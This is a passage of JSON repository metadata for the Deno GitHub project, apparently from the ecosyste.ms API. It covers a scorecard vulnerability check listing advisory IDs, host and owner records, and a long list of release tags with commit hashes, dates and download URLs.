to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sh